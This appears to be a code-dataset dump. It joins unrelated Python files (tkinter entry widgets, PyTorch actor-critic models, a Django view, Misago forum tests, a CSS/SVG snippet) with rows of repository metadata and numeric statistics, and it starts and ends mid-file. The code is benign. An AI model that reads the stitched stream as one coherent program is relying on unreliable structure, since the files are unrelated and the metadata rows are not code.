IDkxLjg1NzExNywtMjAxLjU2NjQxIEMgLTguMTQzMzU0MywtMjAxLjU2NTY0IC04Ny45NzY2MDgsLTE3Ni43MzIzMyAtMTQ3LjY0Mjg4LC0xMjcuMDY2NDEgQyAtMjA3LjMwOTgyLC03Ny4zOTkwOTQgLTIzNy4xNDMxMywwLjQzNDE2MTc1IC0yMzcuMTQyODgsMTA2LjQzMzU5IEMgLTIzNy4xNDMxMywyMTkuMTAwNjEgLTIwNS44MDk4MiwzMTguNjAwNTEgLTE0My4xNDI4OCw0MDQuOTMzNTkgQyAtODAuNDc2NjE1LDQ5MS4yNjcgLTcuMTQzMzU1Myw1MzQuNDMzNjMgNzYuODU3MTE3LDUzNC40MzM1OSBDIDE0NC4xODk4Myw1MzQuNDMzNjMgMTk5Ljg1NjQ0LDUwMS45MzM2NiAyNDMuODU3MTIsNDM2LjkzMzU5IEMgMjg3Ljg1NjM1LDM3MS45MzM3OSAzMDkuODU2MzMsMjkzLjQzMzg3IDMwOS44NTcxMiwyMDEuNDMzNTkgQyAzMDkuODU2MzMsNTUuNDM0MTA3IDI0OC44NTYzOSwtNzguODk5MDkyIDEyNi44NTcxMiwtMjAxLjU2NjQxIEwgMTI2Ljg1NzEyLC0yMDEuNTY2NDEgeiIKICAgICAgIGlkPSJ0ZXh0MjMzMiIgLz4KICA8L2c+Cjwvc3ZnPgo="
width=10, height=20, style="margin-right:5px;"></img>
""",
css_classes=["custom-slider-title"],
)
# Custom CSS
style = lambda: Div(
text="""
<style>
.custom-slider {
left: 5px !important;
}
.custom-slider .bk-slider-title {
margin-left: -3px;
}
.custom-slider .bk-slider-value {
font-weight: unset;
}
.custom-slider-title {
position: relative !important;
text-align: right;
width: 20px !important;
height: 20px;
}
.seed-button .bk-btn {
padding: 6px 6px !important;
transform: rotate(-90deg);
background-color: #ffe0c6 !important;
margin-top: 45px;
height: 30px;
margin-left: -30px;
}
.colorbar-slider .bk-noUi-draggable {
%s
}
</style>
"""
% plasma
)
| 162.830508 | 4,365 | 0.946497 | 160 | 9,607 | 56.76875 | 0.4875 | 0.007927 | 0.004294 | 0.003523 | 0.031047 | 0.031047 | 0.024441 | 0.024441 | 0.024441 | 0.024441 | 0 | 0.119316 | 0.031644 | 9,607 | 58 | 4,366 | 165.637931 | 0.857035 | 0.004268 | 0 | 0.14 | 0 | 0.04 | 0.972077 | 0.891027 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.14 | 0 | 0.14 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b807287da3c4bf49a92c625c1bcd341834befe1 | 16,253 | py | Python | tesliper/gui/components/numeric_entry.py | mishioo/tesliper | e09dcbc0eeb5cc5f7d612ea7f913e4c5dd58a327 | [
"BSD-2-Clause"
] | null | null | null | tesliper/gui/components/numeric_entry.py | mishioo/tesliper | e09dcbc0eeb5cc5f7d612ea7f913e4c5dd58a327 | [
"BSD-2-Clause"
] | 4 | 2022-02-24T18:28:39.000Z | 2022-03-23T16:27:59.000Z | tesliper/gui/components/numeric_entry.py | mishioo/tesliper | e09dcbc0eeb5cc5f7d612ea7f913e4c5dd58a327 | [
"BSD-2-Clause"
] | null | null | null | import logging
import math
import operator
import sys
import tkinter as tk
from tkinter import ttk
logger = logging.getLogger(__name__)
# TODO: refactor IntegerEntry and NumericEntry to have common base class
class IntegerEntry(ttk.Entry):
"""Entry Entry that holds an integer value. Implements validation."""
def __init__(
self,
parent,
scroll_rate=1,
min_value=float("-inf"),
max_value=float("inf"),
include_min_value=True,
include_max_value=True,
**kwargs,
):
self.scroll_rate = scroll_rate
self.min_value = min_value
self.max_value = max_value
self.include_min_value = include_min_value
self.include_max_value = include_max_value
kwargs["textvariable"] = kwargs.get("textvariable", None) or tk.StringVar()
kwargs["validate"] = kwargs.get("validate", None) or "all"
if "validatecommand" not in kwargs:
validatecommand = (
parent.register(self._validate),
"%S",
"%P",
"%s",
"%V",
"%d",
)
kwargs["validatecommand"] = validatecommand
if "invalidcommand" not in kwargs:
invalidcommand = (
parent.register(self._on_invalid),
"%S",
"%P",
"%s",
"%V",
"%d",
)
kwargs["invalidcommand"] = invalidcommand
self.var = kwargs["textvariable"]
self._previous = "" # used to recover after invalid "select all + paste"
super().__init__(parent, **kwargs)
self.bind("<MouseWheel>", self._on_mousewheel)
# For Linux
self.bind("<Button-4>", self._on_mousewheel)
self.bind("<Button-5>", self._on_mousewheel)
# loose focus to parent on Enter key press
self.bind("<Return>", lambda _e, p=parent: p.focus_set())
def configure(self, cnf=None, **kwargs):
customs = [
"min_value",
"max_value",
"include_min_value",
"include_max_value",
]
for key in customs:
value = kwargs.pop(key, None)
if value is not None:
setattr(self, key, value)
super().configure(cnf, **kwargs)
self.update()
def is_in_bounds(self, value):
upper_op = operator.le if self.include_max_value else operator.lt
lower_op = operator.ge if self.include_min_value else operator.gt
return upper_op(value, self.max_value) and lower_op(value, self.min_value)
def update(self, value=None):
if value is None and not self.get():
logger.debug(f"Update aborted, {self} deliberately empty.")
return
value = value if value is not None else self.get()
try:
self.var.set(self.format(value))
except ValueError:
logger.warning(
f"Cannot update {self}: {repr(value)} can't be converted to int"
)
@staticmethod
def format(value):
value = "{:d}".format(int(value))
return value
@property
def allowed_chars(self):
allowed = "0123456789"
if self.min_value < 0:
allowed += "-"
return allowed
def _on_mousewheel(self, event):
if event is not None:
logger.debug(f"Event caught by {self}._on_mousewheel handler.")
try:
current = int(self.var.get())
except ValueError:
convertible = False
else:
convertible = True
if str(self["state"]) == "disabled" or not convertible:
return # ignore event if widget is disabled or edition unfinished
delta = event.delta if sys.platform == "darwin" else int(event.delta / 120)
current = int(self.var.get())
updated = current + self.scroll_rate * delta
if self.is_in_bounds(updated):
self.var.set(self.format(updated))
def _validate(self, change, after, before, reason, action_code):
"""Enables only values that cen be interpreted as floats."""
logger.debug(
f"Input in {self} validation: change={change}, after={after}, "
f"before={before}, reason={reason}."
)
if reason == "focusin":
self._previous = before
if action_code and any(c not in self.allowed_chars for c in change):
return False
if "-" in change and "-" in before and action_code:
return False # do not allow double sign
if "-" in after and not after.startswith("-"):
return False # only allow sign in the beginning
if not after and reason == "focusout":
return False # do not allow no value
if reason == "focusout":
try:
converted = int(after)
except ValueError:
return False
if not self.is_in_bounds(converted):
return False
self.var.set(self.format(after)) # format only on valid "focusout"
return True
def _on_invalid(self, change, after, before, reason, action_code):
"""Change value to form accepted by float constructor."""
logger.debug(
f"Input in {self} invalid: change={change}, after={after}, "
f"before={before}, reason={reason}."
)
if (
"-" in change
and not before.startswith("-")
and action_code # not deletion
and self.min_value < 0
):
after = "-" + before
elif change == "-" and before.startswith("-") and action_code:
after = before[1:]
if after == "-" and self.min_value < 0:
after = after + "0"
try:
converted = int(after)
if not self.is_in_bounds(converted) and reason == "focusout":
raise ValueError # treat out-of-bounds value as invalid on "focusout"
except ValueError:
# revert if invalid float
after = self._previous if reason == "focusout" else before
else:
# format only on "focusout"
after = self.format(after) if reason == "focusout" else after
self.var.set(after)
class NumericEntry(ttk.Entry):
"""Entry that holds a numeric value. Implements validation and changing value
on mouse wheel event.
Parameters
----------
scroll_rate : float
Value to add/substract to/from current value on scroll wheel event.
Must not be specified if scroll_factor is given.
scroll_factor : float
Value by which to multiply/divide current value on scroll wheel event.
Must not be specified if scroll_rate is given.
scroll_modifier : callable[float, int]
Custom function calculating new value after mouse wheel event.
Must accept current value and standardized scroll delta value as parameters.
Raises
------
TypeError
If both, scroll_rate and scroll_factor are specified.
"""
def __init__(
self,
parent,
scroll_rate=None,
scroll_factor=None,
scroll_modifier=None,
decimal_digits=4,
rounding=None, # or "up" or "down"
keep_trailing_zeros=False,
min_value=float("-inf"),
max_value=float("inf"),
include_min_value=True,
include_max_value=True,
**kwargs,
):
self.scroll_factor = scroll_factor
self.scroll_rate = scroll_rate
self.scroll_modifier = scroll_modifier
self.decimal_digits = decimal_digits
self.rounding = rounding
self.keep_trailing_zeros = keep_trailing_zeros
self.min_value = min_value
self.max_value = max_value
self.include_min_value = include_min_value
self.include_max_value = include_max_value
kwargs["textvariable"] = kwargs.get("textvariable", None) or tk.StringVar()
kwargs["validate"] = kwargs.get("validate", None) or "all"
if "validatecommand" not in kwargs:
validatecommand = (
parent.register(self._validate),
"%S",
"%P",
"%s",
"%V",
"%d",
)
kwargs["validatecommand"] = validatecommand
if "invalidcommand" not in kwargs:
invalidcommand = (
parent.register(self._on_invalid),
"%S",
"%P",
"%s",
"%V",
"%d",
)
kwargs["invalidcommand"] = invalidcommand
self.var = kwargs["textvariable"]
self._previous = "" # used to recover after invalid "select all + paste"
super().__init__(parent, **kwargs)
self.bind("<MouseWheel>", self._on_mousewheel)
# For Linux
self.bind("<Button-4>", self._on_mousewheel)
self.bind("<Button-5>", self._on_mousewheel)
# loose focus to parent on Enter key press
self.bind("<Return>", lambda _e, p=parent: p.focus_set())
def is_in_bounds(self, value):
upper_op = operator.le if self.include_max_value else operator.lt
lower_op = operator.ge if self.include_min_value else operator.gt
return upper_op(value, self.max_value) and lower_op(value, self.min_value)
def configure(self, cnf=None, **kwargs):
customs = [
"scroll_rate",
"scroll_factor",
"scroll_modifier",
"decimal_digits",
"keep_trailing_zeros",
"min_value",
"max_value",
"include_min_value",
"include_max_value",
]
for key in customs:
value = kwargs.pop(key, None)
if value is not None:
setattr(self, key, value)
super().configure(cnf, **kwargs)
self.update()
def round(self, value):
factor = 10 ** self.decimal_digits
if self.rounding == "up":
return math.ceil(value * factor) / factor
elif self.rounding == "down":
return math.floor(value * factor) / factor
else:
return round(value, self.decimal_digits)
def update(self, value=None):
if value is None and not self.get():
logger.debug(f"Update aborted, {self} deliberately empty.")
return
value = value if value is not None else self.get()
value = self.round(value) if isinstance(value, float) else value
try:
self.var.set(self.format(value))
except ValueError:
logger.warning(
f"Cannot update {self}: {repr(value)} can't be converted to float"
)
@property
def scroll_factor(self):
return self._scroll_factor
@scroll_factor.setter
def scroll_factor(self, value):
if value is not None and getattr(self, "scroll_rate", None) is not None:
raise TypeError("Only one, scroll_rate or scroll_factor may be specified.")
self._scroll_factor = value
@property
def scroll_rate(self):
return self._scroll_rate
@scroll_rate.setter
def scroll_rate(self, value):
if value is not None and getattr(self, "scroll_factor", None) is not None:
raise TypeError("Only one, scroll_rate or scroll_factor may be specified.")
self._scroll_rate = value
@property
def scroll_modifier(self):
if self._scroll_modifier is not None:
return self._scroll_modifier
elif getattr(self, "scroll_rate") is not None:
return lambda v, d, r=self.scroll_rate: v + r * d
elif getattr(self, "scroll_factor") is not None:
return lambda v, d, f=self.scroll_factor: v * f ** d
else:
return lambda v, d: v
@scroll_modifier.setter
def scroll_modifier(self, value):
self._scroll_modifier = value
def format(self, value):
formatter = f"{{:.{self.decimal_digits}f}}"
value = formatter.format(float(value))
if not self.keep_trailing_zeros:
value = value.rstrip("0") # discard insignificant trailing zeros
if value.endswith("."):
value += "0" # but keep at least one decimal digit
return value
def _on_mousewheel(self, event):
if event is not None:
logger.debug(f"Event caught by {self}._on_mousewheel handler.")
try:
_ = float(self.var.get())
except ValueError:
convertible = False
else:
convertible = True
if str(self["state"]) == "disabled" or not convertible:
return # ignore event if widget is disabled or edition unfinished
delta = event.delta if sys.platform == "darwin" else int(event.delta / 120)
current = float(self.var.get())
updated = self.scroll_modifier(current, delta)
updated = self.format(updated)
if self.is_in_bounds(float(updated)):
self.var.set(updated)
@property
def allowed_chars(self):
allowed = "0123456789.,"
if self.min_value < 0:
allowed += "-"
return allowed
def _validate(self, change, after, before, reason, action_code):
"""Enables only values that cen be interpreted as floats."""
logger.debug(
f"Input in {self} validation: change={change}, after={after}, "
f"before={before}, reason={reason}."
)
if reason == "focusin":
self._previous = before
if action_code and any(c not in self.allowed_chars for c in change):
return False
if (
any(c in ".," for c in change)
and any(c in ".," for c in before)
and any(c in ".," for c in after)
):
return False # do not allow double decimal separator
if "-" in change and "-" in before and action_code:
return False # do not allow double sign
if "-" in after and not after.startswith("-"):
return False # only allow sign in the beginning
if after in ".,-" or after.endswith((".", ",")):
# includes also unfinished negative float
return reason != "focusout" # consider it invalid only when typing is over
if not after and reason == "focusout":
return False # do not allow no value
if reason == "focusout":
try:
converted = float(after)
except ValueError:
return False
if not self.is_in_bounds(converted):
return False
self.var.set(self.format(after)) # format only on valid "focusout"
return True
def _on_invalid(self, change, after, before, reason, action_code):
"""Change value to form accepted by float constructor."""
logger.debug(
f"Input in {self} invalid: change={change}, after={after}, "
f"before={before}, reason={reason}."
)
if (
"-" in change
and not before.startswith("-")
and action_code # not deletion
and self.min_value < 0
):
after = "-" + before
elif change == "-" and before.startswith("-") and action_code:
after = before[1:]
if "," in after:
# consider both, comma and dot, a decimal separator
after = after.replace(",", ".")
if after.endswith("."):
after = after + "0"
if after == "-" and self.min_value < 0:
after = after + "0"
try:
converted = float(after)
if not self.is_in_bounds(converted) and reason == "focusout":
raise ValueError # treat out-of-bounds value as invalid on "focusout"
except ValueError:
# revert if invalid float
after = self._previous if reason == "focusout" else before
else:
# format only on "focusout"
after = self.format(after) if reason == "focusout" else after
self.var.set(after)
| 36.523596 | 87 | 0.568818 | 1,886 | 16,253 | 4.773065 | 0.130965 | 0.023106 | 0.012997 | 0.007998 | 0.748611 | 0.732504 | 0.717507 | 0.701733 | 0.701733 | 0.701733 | 0 | 0.004318 | 0.330339 | 16,253 | 444 | 88 | 36.605856 | 0.822767 | 0.127115 | 0 | 0.731903 | 0 | 0 | 0.114186 | 0.00498 | 0 | 0 | 0 | 0.002252 | 0 | 1 | 0.067024 | false | 0 | 0.016086 | 0.005362 | 0.182306 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b8da095aea7babc9f9fef817638723ba12ec0d8 | 64 | py | Python | minato_namikaze/bot_files/lib/database/discord_database/__init__.py | Dhruvacube/dhruva-shaw-bot | 7300daf9353a17b6c6d69a8a932317e7c83299e5 | [
"Apache-2.0"
] | 1 | 2021-03-02T14:31:53.000Z | 2021-03-02T14:31:53.000Z | minato_namikaze/bot_files/lib/database/discord_database/__init__.py | Dhruvacube/yondaime-hokage | 0a2ea21bcb3a75baadb5c080a5dc6382f1fa7c71 | [
"Apache-2.0"
] | 62 | 2021-02-27T15:41:08.000Z | 2021-05-13T14:21:31.000Z | minato_namikaze/bot_files/lib/database/discord_database/__init__.py | Dhruvacube/dhruva-shaw-bot | 7300daf9353a17b6c6d69a8a932317e7c83299e5 | [
"Apache-2.0"
] | 1 | 2021-03-07T10:03:55.000Z | 2021-03-07T10:03:55.000Z | from .backup import *
from .badges import *
from .tags import *
| 16 | 21 | 0.71875 | 9 | 64 | 5.111111 | 0.555556 | 0.434783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 64 | 3 | 22 | 21.333333 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
29b9200d03bd44156d57d11954d20228a29fc75a | 41 | py | Python | kerasutils/losses/__init__.py | tchaye59/kerasutils | 2849a35a246282851f5cdc22625b2afefb81bf65 | [
"MIT"
] | null | null | null | kerasutils/losses/__init__.py | tchaye59/kerasutils | 2849a35a246282851f5cdc22625b2afefb81bf65 | [
"MIT"
] | null | null | null | kerasutils/losses/__init__.py | tchaye59/kerasutils | 2849a35a246282851f5cdc22625b2afefb81bf65 | [
"MIT"
] | null | null | null | from kerasutils.losses.bb_losses import * | 41 | 41 | 0.853659 | 6 | 41 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 41 | 1 | 41 | 41 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
29b9b4a91e445562a3745bc676cb7eb4deb065f7 | 5,120 | py | Python | code/model.py | ptrtmv/DRL_MultiAgent_Tenis | b26a281d4c63d7a9abf850235423d3019cdd244a | [
"MIT"
] | null | null | null | code/model.py | ptrtmv/DRL_MultiAgent_Tenis | b26a281d4c63d7a9abf850235423d3019cdd244a | [
"MIT"
] | null | null | null | code/model.py | ptrtmv/DRL_MultiAgent_Tenis | b26a281d4c63d7a9abf850235423d3019cdd244a | [
"MIT"
] | 1 | 2019-07-06T12:45:11.000Z | 2019-07-06T12:45:11.000Z | '''
Created on Jun 25, 2019
@author: ptrtmv
'''
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def hidden_init(layer):
fan_in = layer.weight.data.size()[0]
lim = 1. / np.sqrt(fan_in)
return (-lim, lim)
class Actor(nn.Module):
"""Actor (Policy) Model."""
def __init__(self, stateSize,actionSize,
hiddenLayers=[256,128],
batchNormAfterLayers=None,
seed = None):
"""Initialize parameters and build model.
Params
======
"""
super(Actor, self).__init__()
self.seed = torch.manual_seed(seed)
self.hiddenLayers = [stateSize, *hiddenLayers]
# check if and where batchNorm should be added
batchCount = 0
if batchNormAfterLayers!= None :
nextBatchLayer = batchNormAfterLayers[0]
else:
nextBatchLayer = None
self.network = nn.ModuleList([])
i = 0
for s1,s2 in zip(self.hiddenLayers[:-1],self.hiddenLayers[1:]):
# check if to attach batch-norm here
if i == nextBatchLayer:
self.network.append(nn.BatchNorm1d(s1)) # append the batch layer
batchCount = min( len(batchNormAfterLayers)-1,batchCount+1) # adjust index running over batch-norm layers
nextBatchLayer = batchNormAfterLayers[batchCount] # get the position of the next batch-norm layer
self.network.append(nn.Linear(s1,s2))
i+=1
self.outLayer = nn.Linear(s2,actionSize)
self.reset_parameters()
def reset_parameters(self):
for layer in self.network:
if type(layer) == nn.Linear:
layer.weight.data.uniform_(*hidden_init(layer))
self.outLayer.weight.data.uniform_(-3e-3, 3e-3)
def forward(self, state):
nextX = state
for layer in self.network:
if type(layer) == nn.Linear:
nextX = F.relu(layer(nextX))
else: #this should be a batch-layer
nextX = layer(nextX)
return torch.tanh(self.outLayer(nextX))
class Critic(nn.Module):
"""Critic (Value) Model."""
def __init__(self, stateSize,actionSize,
hiddenLayers=[256,128],
batchNormAfterLayers=None,
attachActionToLayer=1,
seed = None):
"""Initialize parameters and build model.
Params
======
"""
super(Critic, self).__init__()
self.seed = torch.manual_seed(seed)
self.attachActionToLayer = attachActionToLayer
self.hiddenLayers = [stateSize, *hiddenLayers]
# check if and where batchNorm should be added
batchCount = 0
if batchNormAfterLayers!= None :
nextBatchLayer = batchNormAfterLayers[batchCount]
else:
nextBatchLayer = None
self.network = nn.ModuleList([])
i = 0
for s1,s2 in zip(self.hiddenLayers[:-1],self.hiddenLayers[1:]):
# check if the action should be attached here
# and adjust the size of the layer
if i == attachActionToLayer:
s1 += actionSize
# check if to attach batch-norm here
if i == nextBatchLayer:
self.network.append(nn.BatchNorm1d(s1)) # append the batch layer
batchCount = min( len(batchNormAfterLayers)-1,batchCount+1) # adjust index running over batch-norm layers
nextBatchLayer = batchNormAfterLayers[batchCount] # get the position of the next batch-norm layer
# if the action has not been attached yet
# we have to shift the index of the layer it should be attached to
# because an additional batch layer has been added
if attachActionToLayer > i:
self.attachActionToLayer += 1
self.network.append(nn.Linear(s1,s2))
i+=1
self.outLayer = nn.Linear(s2,1)
self.reset_parameters()
def reset_parameters(self):
for layer in self.network:
if type(layer) == nn.Linear:
layer.weight.data.uniform_(*hidden_init(layer))
self.outLayer.weight.data.uniform_(-3e-3, 3e-3)
def forward(self, state, action):
nextX = state
i = 0
for layer in self.network:
if i == self.attachActionToLayer:
nextX = torch.cat((nextX, action), dim=1)
if type(layer) == nn.Linear:
nextX = F.relu(layer(nextX))
else: #this should be a batch-layer
nextX = layer(nextX)
i+=1
return self.outLayer(nextX)
| 30.295858 | 132 | 0.535352 | 531 | 5,120 | 5.103578 | 0.222222 | 0.04059 | 0.025092 | 0.028044 | 0.736162 | 0.736162 | 0.727675 | 0.727675 | 0.727675 | 0.661993 | 0 | 0.020006 | 0.375195 | 5,120 | 168 | 133 | 30.47619 | 0.827133 | 0.175781 | 0 | 0.706522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076087 | false | 0 | 0.043478 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b03192fb2d6b51837641ab19453bb7e0599de24 | 131 | py | Python | nsd1902/devweb/ansible_pro/myansible/mainpage/views.py | MrWangwf/nsd2019 | 5e859b4b1926dc098d236be3720779c50d0a55fc | [
"Apache-2.0"
] | 1 | 2019-09-19T04:53:22.000Z | 2019-09-19T04:53:22.000Z | nsd1902/devweb/ansible_pro/myansible/mainpage/views.py | MrWangwf/nsd2019 | 5e859b4b1926dc098d236be3720779c50d0a55fc | [
"Apache-2.0"
] | null | null | null | nsd1902/devweb/ansible_pro/myansible/mainpage/views.py | MrWangwf/nsd2019 | 5e859b4b1926dc098d236be3720779c50d0a55fc | [
"Apache-2.0"
] | 1 | 2021-12-28T04:26:02.000Z | 2021-12-28T04:26:02.000Z | from django.shortcuts import render
# Create your views here.
def mainpage(request):
return render(request, 'mainpage.html')
| 18.714286 | 43 | 0.755725 | 17 | 131 | 5.823529 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152672 | 131 | 6 | 44 | 21.833333 | 0.891892 | 0.175573 | 0 | 0 | 0 | 0 | 0.122642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
d99e35069db69a81c97302e126ea6c356d598bda | 15,597 | py | Python | misago/misago/threads/tests/test_gotoviews.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | 2 | 2021-03-06T21:06:13.000Z | 2021-03-09T15:05:12.000Z | misago/misago/threads/tests/test_gotoviews.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | null | null | null | misago/misago/threads/tests/test_gotoviews.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | null | null | null | from django.utils import timezone
from .. import test
from ...categories.models import Category
from ...conf.test import override_dynamic_settings
from ...readtracker.poststracker import save_read
from ...users.test import AuthenticatedUserTestCase
from ..test import patch_category_acl
GOTO_URL = "%s#post-%s"
GOTO_PAGE_URL = "%s%s/#post-%s"
POSTS_PER_PAGE = 7
POSTS_PER_PAGE_ORPHANS = 3
class GotoViewTestCase(AuthenticatedUserTestCase):
def setUp(self):
super().setUp()
self.category = Category.objects.get(slug="first-category")
self.thread = test.post_thread(category=self.category)
class GotoPostTests(GotoViewTestCase):
def test_goto_first_post(self):
"""first post redirect url is valid"""
response = self.client.get(self.thread.first_post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
response = self.client.get(response["location"])
self.assertContains(response, self.thread.first_post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_last_post_on_page(self):
"""last post on page redirect url is valid"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
post = test.reply_thread(self.thread)
response = self.client.get(post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"], GOTO_URL % (self.thread.get_absolute_url(), post.pk)
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_post_on_next_page(self):
"""first post on next page redirect url is valid"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
post = test.reply_thread(self.thread)
response = self.client.get(post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_post_on_page_three_out_of_five(self):
"""first post on next page redirect url is valid"""
posts = []
for _ in range(POSTS_PER_PAGE * 4 - 1):
post = test.reply_thread(self.thread)
posts.append(post)
post = posts[POSTS_PER_PAGE * 2 - 3]
response = self.client.get(post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 3, post.pk),
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_event_on_page_three_out_of_five(self):
"""event redirect url is valid"""
posts = []
for _ in range(POSTS_PER_PAGE * 4 - 1):
post = test.reply_thread(self.thread)
posts.append(post)
post = posts[POSTS_PER_PAGE * 2 - 2]
self.thread.has_events = True
self.thread.save()
post.is_event = True
post.save()
response = self.client.get(post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 3, post.pk),
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
class GotoLastTests(GotoViewTestCase):
def test_goto_last_post(self):
"""first post redirect url is valid"""
response = self.client.get(self.thread.get_last_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
response = self.client.get(response["location"])
self.assertContains(response, self.thread.last_post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_last_post_on_page(self):
"""last post on page redirect url is valid"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
post = test.reply_thread(self.thread)
response = self.client.get(self.thread.get_last_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"], GOTO_URL % (self.thread.get_absolute_url(), post.pk)
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
class GotoNewTests(GotoViewTestCase):
def test_goto_first_post(self):
"""first unread post redirect url is valid"""
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_new_post(self):
"""first unread post redirect url in already read thread is valid"""
save_read(self.user, self.thread.first_post)
post = test.reply_thread(self.thread, posted_on=timezone.now())
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
test.reply_thread(self.thread, posted_on=timezone.now())
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"], GOTO_URL % (self.thread.get_absolute_url(), post.pk)
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_new_post_on_next_page(self):
"""first unread post redirect url in already read multipage thread is valid"""
save_read(self.user, self.thread.first_post)
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
last_post = test.reply_thread(self.thread, posted_on=timezone.now())
save_read(self.user, last_post)
post = test.reply_thread(self.thread, posted_on=timezone.now())
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
test.reply_thread(self.thread, posted_on=timezone.now())
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
